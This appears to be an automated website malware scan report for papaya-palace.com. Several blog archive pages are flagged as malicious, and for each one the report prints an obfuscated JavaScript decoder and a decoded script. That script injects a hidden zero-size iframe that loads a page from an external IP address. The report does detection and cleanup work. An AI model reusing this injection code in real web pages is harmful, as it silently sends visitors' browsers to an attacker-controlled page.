Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=papaya-palace.com
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.papaya-palace.com/ | 200 OK Content-Length: 95 Content-Type: text/html | clean |
http://www.papaya-palace.com/test404page.js | 404 Not Found Content-Length: 1640 Content-Type: text/html | clean |
http://www.papaya-palace.com/katbooks | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:38 GMT Location: http://www.papaya-palace.com/katbooks/ Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.papaya-palace.com/katbooks/ | 200 OK Content-Length: 14168 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Obfuscated script found in the page (the sample is cut off in this report):
function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; }
function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= [sample truncated here]
Decoded script (the extracted page printed each statement twice; each is shown once here):
var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe';
var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7);
rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0);
rmm0.setAttribute('style','width: 0; height: 0; border: none;');
rmm0.setAttribute('style','display:none');
var Irp8=navigator.userAgent.toLowerCase();
var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.');
document.body.appendChild(rmm0);
What the decoded script does: it creates an iframe whose src is the external URL in SgC7, sets its width, height and border to 0 and its style to display:none, and appends it to document.body, so the visitor's browser requests the remote page with nothing visible on screen. The user-agent lookups for 'msie' and 'nt 6.' are computed, but the excerpt shown here does not use them. Cleaning the site means removing this script block from every page the scan marks as malicious and then finding and closing whatever allowed it to be written into the files.
Antivirus reports:
| ||
http://www.papaya-palace.com/katbooks/vmabout.html | 200 OK Content-Length: 3547 Content-Type: text/html | clean |
http://www.papaya-palace.com/katlog/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:38 GMT Location: http://papaya-palace.com/katlog/ Server: Apache Content-Type: text/html; charset=UTF-8 X-Pingback: http://papaya-palace.com/katlog/xmlrpc.php X-Powered-By: PHP/5.2.11 | clean |
http://papaya-palace.com/katlog/ | 200 OK Content-Length: 28958 Content-Type: text/html | clean |
http://www.google.com/reader/ui/publisher-en.js | HTTP/1.1 301 Moved Permanently Cache-Control: public, max-age=2592000 Connection: close Date: Thu, 08 Jan 2015 16:21:17 GMT Age: 3382 Location: http://www.google.com/reader/about/ Server: sffe Content-Length: 232 Content-Type: text/html; charset=UTF-8 Expires: Sat, 07 Feb 2015 16:21:17 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
http://www.google.com/reader/about/ | 200 OK Content-Length: 3563 Content-Type: text/html | clean |
http://www.google.com//www.google.com/js/google.js/ | 404 Not Found Content-Length: 1453 Content-Type: text/html | clean |
http://www.google.com//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://www.google.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://www.google.com//www.google.com/js/maia.js/ | 404 Not Found Content-Length: 1451 Content-Type: text/html | clean |
http://www.google.com/reader/public/javascript-sub/user/10725955556447852308/label/blogroll?callback=GRC_p(%7Bc%3A%22blue%22%2Ct%3A%22%22%2Cb%3A%22true%22%7D)%3Bnew%20GRC | HTTP/1.1 301 Moved Permanently Cache-Control: public, max-age=2592000 Connection: close Date: Thu, 08 Jan 2015 17:17:40 GMT Location: http://www.google.com/reader/about/ Server: sffe Content-Length: 232 Content-Type: text/html; charset=UTF-8 Expires: Sat, 07 Feb 2015 17:17:40 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
http://www.papaya-palace.com/portal.html | 404 Not Found Content-Length: 1640 Content-Type: text/html | clean |
http://www.papaya-palace.com/katlog | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:40 GMT Location: http://www.papaya-palace.com/katlog/ Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.papaya-palace.com/katbooks/archives/cat_general_fiction.html | 200 OK Content-Length: 11179 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Obfuscated script found in the page (the sample is cut off in this report):
function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; }
function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= [sample truncated here]
Decoded script (the extracted page printed each statement twice; each is shown once here):
var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe';
var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7);
rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0);
rmm0.setAttribute('style','width: 0; height: 0; border: none;');
rmm0.setAttribute('style','display:none');
var Irp8=navigator.userAgent.toLowerCase();
var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.');
document.body.appendChild(rmm0);
What the decoded script does: it creates an iframe whose src is the external URL in SgC7, sets its width, height and border to 0 and its style to display:none, and appends it to document.body, so the visitor's browser requests the remote page with nothing visible on screen. The user-agent lookups for 'msie' and 'nt 6.' are computed, but the excerpt shown here does not use them. Cleaning the site means removing this script block from every page the scan marks as malicious and then finding and closing whatever allowed it to be written into the files.
Antivirus reports:
| ||
http://www.papaya-palace.com/katbooks/archives/000492.html | 200 OK Content-Length: 11258 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Obfuscated script found in the page (the sample is cut off in this report):
function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; }
function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= [sample truncated here]
Decoded script (the extracted page printed each statement twice; each is shown once here):
var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe';
var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7);
rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0);
rmm0.setAttribute('style','width: 0; height: 0; border: none;');
rmm0.setAttribute('style','display:none');
var Irp8=navigator.userAgent.toLowerCase();
var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.');
document.body.appendChild(rmm0);
What the decoded script does: it creates an iframe whose src is the external URL in SgC7, sets its width, height and border to 0 and its style to display:none, and appends it to document.body, so the visitor's browser requests the remote page with nothing visible on screen. The user-agent lookups for 'msie' and 'nt 6.' are computed, but the excerpt shown here does not use them. Cleaning the site means removing this script block from every page the scan marks as malicious and then finding and closing whatever allowed it to be written into the files.
Antivirus reports:
| ||
http://www.papaya-palace.com/katbooks/archives/000491.html | 200 OK Content-Length: 18559 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Obfuscated script found in the page (the sample is cut off in this report):
function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; }
function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= [sample truncated here]
Decoded script (the extracted page printed each statement twice; each is shown once here):
var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe';
var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7);
rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0);
rmm0.setAttribute('style','width: 0; height: 0; border: none;');
rmm0.setAttribute('style','display:none');
var Irp8=navigator.userAgent.toLowerCase();
var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.');
document.body.appendChild(rmm0);
What the decoded script does: it creates an iframe whose src is the external URL in SgC7, sets its width, height and border to 0 and its style to display:none, and appends it to document.body, so the visitor's browser requests the remote page with nothing visible on screen. The user-agent lookups for 'msie' and 'nt 6.' are computed, but the excerpt shown here does not use them. Cleaning the site means removing this script block from every page the scan marks as malicious and then finding and closing whatever allowed it to be written into the files.
Antivirus reports:
| ||
http://www.papaya-palace.com/katbooks/archives/000490.html | 200 OK Content-Length: 12044 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Obfuscated script found in the page (the sample is cut off in this report):
function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; }
function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= [sample truncated here]
Decoded script (the extracted page printed each statement twice; each is shown once here):
var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe';
var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7);
rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0);
rmm0.setAttribute('style','width: 0; height: 0; border: none;');
rmm0.setAttribute('style','display:none');
var Irp8=navigator.userAgent.toLowerCase();
var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.');
document.body.appendChild(rmm0);
What the decoded script does: it creates an iframe whose src is the external URL in SgC7, sets its width, height and border to 0 and its style to display:none, and appends it to document.body, so the visitor's browser requests the remote page with nothing visible on screen. The user-agent lookups for 'msie' and 'nt 6.' are computed, but the excerpt shown here does not use them. Cleaning the site means removing this script block from every page the scan marks as malicious and then finding and closing whatever allowed it to be written into the files.
Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: papaya-palace.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: papaya-palace.com
Referer: http://www.google.com/search?q=papaya-palace.com
Result:
The result is similar to the first query. No suspicious redirects were found.